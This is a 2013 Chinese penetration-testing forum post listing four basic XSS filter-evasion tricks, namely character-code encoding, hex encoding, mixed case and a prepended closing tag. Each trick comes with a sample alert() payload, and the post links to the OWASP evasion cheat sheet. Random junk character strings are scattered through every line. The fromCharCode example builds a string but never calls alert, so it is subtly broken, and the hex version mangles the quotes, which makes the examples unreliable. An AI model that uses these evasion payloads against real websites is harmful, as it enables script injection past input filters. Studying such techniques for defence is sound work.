中国网络渗透测试联盟

标题: XSS 绕过技术 [打印本页]

作者: admin    时间: 2013-2-14 00:10
标题: XSS 绕过技术
四种超级基础的绕过方法。9 s* w" ^* U" [8 D
1.转换为ASCII码' H6 C# [& x+ W  F$ `
例子:原脚本为<script>alert(‘I love F4ck’)</script >
  @6 d6 y% U8 s3 k' D通过转换,变成:" u" W6 |, ]% N
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
4 N7 o0 B+ j) t0 A : k% g# A& I/ V& {5 O' s
2.转换为HEX(十六进制)
8 [( s: W& U- E$ j( c例子:原脚本为<script>alert(‘I love F4ck’)</script>
) S' _. Q4 ?7 Y2 i  u& y; _6 |( @/ F通过转换,变成:
+ J9 F, j. t/ l# J/ q. @%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
" p& k$ K  O( `& \* j 9 a# t( w% \3 |! C
3.转换脚本的大小写
, B$ R9 S" B1 e7 x" S( k4 Z' r例子:原脚本为<script>alert(‘I love F4ck’)</script>8 Z/ p, u, e2 i  l
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
+ x" }; F: k  N0 o8 _6 y: L( N
% {" E- T9 u5 }; q; S" t4.增加闭合标记”>
0 R. F% o6 |: r2 O3 ^( `, C! j: y7 J例子:原脚本为<script>alert(‘I love F4ck’)</script>
* _3 O! U$ `4 X) ?6 Q) X转换为:”><script>alert(‘I love F4ck’)</script>
2 A5 e5 a% \  z0 [更详细绕过技术请参考此网页
9 w; ]  j  S# b; W! i" a6 Q: ohttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet+ @* S+ D8 T/ f* z

- x* u4 H! `4 L9 x8 R! Q/ D9 O转换工具使用的是火狐的 hackbar mozilla addon.




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2